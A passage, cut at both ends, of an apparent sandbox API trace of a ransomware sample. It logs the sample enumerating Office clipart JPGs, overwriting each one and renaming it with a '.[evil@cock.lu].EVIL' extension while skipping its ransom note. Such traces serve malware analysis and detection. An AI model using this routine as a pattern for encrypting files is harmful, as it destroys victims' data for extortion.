Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.558] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.558] __uncaught_exception () returned 0x84b1160800 [0155.558] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.558] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341439.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341439.jpg.[evil@cock.lu].evil")) returned 1 [0155.559] ??_V@YAXPEAX@Z () returned 0x1 [0155.562] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG", dwFileAttributes=0x200) returned 0 [0155.562] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.562] wcsstr (_Str="J0341447.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.562] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG") returned 69 [0155.562] wcscmp (_String1="J0341447.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.562] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341447.JPG") returned 0x0 [0155.562] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG") returned 0x45 [0155.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341447.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.564] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4ad8, lpOverlapped=0x0) returned 1 [0155.571] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.571] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.571] _errno () returned 0x84b1160840 [0155.571] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.571] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ae0, lpOverlapped=0x0) returned 1 [0155.574] CloseHandle (hObject=0x1a8) returned 1 [0155.574] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.574] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.574] __uncaught_exception () returned 0x84b1160800 [0155.574] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.575] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341447.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341447.jpg.[evil@cock.lu].evil")) returned 1 [0155.592] ??_V@YAXPEAX@Z () returned 0x1 [0155.596] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG", dwFileAttributes=0x200) returned 0 [0155.596] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.596] wcsstr (_Str="J0341448.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.596] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG") returned 69 [0155.596] wcscmp (_String1="J0341448.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.596] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341448.JPG") returned 0x0 [0155.596] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG") returned 0x45 [0155.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341448.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.605] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x52c3, lpOverlapped=0x0) returned 1 [0155.633] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.633] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.633] _errno () returned 0x84b1160840 [0155.633] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.633] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x52e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x52e0, lpOverlapped=0x0) returned 1 [0155.633] CloseHandle (hObject=0x1a8) returned 1 [0155.633] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.633] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.634] __uncaught_exception () returned 0x84b1160800 [0155.634] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.634] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341448.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341448.jpg.[evil@cock.lu].evil")) returned 1 [0155.635] ??_V@YAXPEAX@Z () returned 0x1 [0155.638] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG", dwFileAttributes=0x200) returned 0 [0155.639] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.639] wcsstr (_Str="J0341455.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.639] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG") returned 69 [0155.639] wcscmp (_String1="J0341455.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.639] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341455.JPG") returned 0x0 [0155.639] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG") returned 0x45 [0155.639] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341455.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.641] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7457, lpOverlapped=0x0) returned 1 [0155.672] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.672] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.672] _errno () returned 0x84b1160840 [0155.672] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.672] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7460, lpOverlapped=0x0) returned 1 [0155.672] CloseHandle (hObject=0x1a8) returned 1 [0155.672] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.672] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.673] __uncaught_exception () returned 0x84b1160800 [0155.673] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.673] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341455.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341455.jpg.[evil@cock.lu].evil")) returned 1 [0155.674] ??_V@YAXPEAX@Z () returned 0x1 [0155.676] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG", dwFileAttributes=0x200) returned 0 [0155.676] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.676] wcsstr (_Str="J0341475.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.676] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG") returned 69 [0155.676] wcscmp (_String1="J0341475.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.676] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341475.JPG") returned 0x0 [0155.676] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG") returned 0x45 [0155.676] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341475.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.678] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa9e2, lpOverlapped=0x0) returned 1 [0155.739] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.739] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.739] _errno () returned 0x84b1160840 [0155.740] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.740] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xaa00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaa00, lpOverlapped=0x0) returned 1 [0155.740] CloseHandle (hObject=0x1a8) returned 1 [0155.740] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.740] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.740] __uncaught_exception () returned 0x84b1160800 [0155.740] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.741] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341475.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341475.jpg.[evil@cock.lu].evil")) returned 1 [0155.742] ??_V@YAXPEAX@Z () returned 0x1 [0155.745] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG", dwFileAttributes=0x200) returned 0 [0155.745] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.745] wcsstr (_Str="J0341499.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.745] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG") returned 69 [0155.745] wcscmp (_String1="J0341499.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.745] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341499.JPG") returned 0x0 [0155.745] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG") returned 0x45 [0155.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341499.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.750] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3ee3, lpOverlapped=0x0) returned 1 [0155.765] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.765] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.765] _errno () returned 0x84b1160840 [0155.765] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.765] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3f00, lpOverlapped=0x0) returned 1 [0155.765] CloseHandle (hObject=0x1a8) returned 1 [0155.765] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.766] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.766] __uncaught_exception () returned 0x84b1160800 [0155.766] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.766] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341499.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341499.jpg.[evil@cock.lu].evil")) returned 1 [0155.767] ??_V@YAXPEAX@Z () returned 0x1 [0155.771] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG", dwFileAttributes=0x200) returned 0 [0155.772] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.772] wcsstr (_Str="J0341534.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.772] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG") returned 69 [0155.772] wcscmp (_String1="J0341534.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.772] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341534.JPG") returned 0x0 [0155.772] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG") returned 0x45 [0155.772] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341534.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.775] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f8a, lpOverlapped=0x0) returned 1 [0155.785] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.785] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.785] _errno () returned 0x84b1160840 [0155.785] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.785] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1fa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1fa0, lpOverlapped=0x0) returned 1 [0155.785] CloseHandle (hObject=0x1a8) returned 1 [0155.785] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.786] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.786] __uncaught_exception () returned 0x84b1160800 [0155.786] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.786] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341534.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341534.jpg.[evil@cock.lu].evil")) returned 1 [0155.787] ??_V@YAXPEAX@Z () returned 0x1 [0155.791] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG", dwFileAttributes=0x200) returned 0 [0155.791] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.792] wcsstr (_Str="J0341551.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.792] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG") returned 69 [0155.792] wcscmp (_String1="J0341551.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.792] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341551.JPG") returned 0x0 [0155.792] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG") returned 0x45 [0155.792] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341551.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.794] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5a56, lpOverlapped=0x0) returned 1 [0155.814] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.814] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.814] _errno () returned 0x84b1160840 [0155.814] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.814] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x5a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5a60, lpOverlapped=0x0) returned 1 [0155.814] CloseHandle (hObject=0x1a8) returned 1 [0155.814] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.815] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.815] __uncaught_exception () returned 0x84b1160800 [0155.815] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.815] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341551.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341551.jpg.[evil@cock.lu].evil")) returned 1 [0155.816] ??_V@YAXPEAX@Z () returned 0x1 [0155.820] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG", dwFileAttributes=0x200) returned 0 [0155.820] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.820] wcsstr (_Str="J0341554.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.820] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG") returned 69 [0155.820] wcscmp (_String1="J0341554.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.820] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341554.JPG") returned 0x0 [0155.820] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG") returned 0x45 [0155.820] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341554.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.823] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6f43, lpOverlapped=0x0) returned 1 [0155.832] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.832] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.832] _errno () returned 0x84b1160840 [0155.833] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.833] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x6f60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6f60, lpOverlapped=0x0) returned 1 [0155.833] CloseHandle (hObject=0x1a8) returned 1 [0155.833] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.833] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.833] __uncaught_exception () returned 0x84b1160800 [0155.833] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.834] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341554.jpg"), 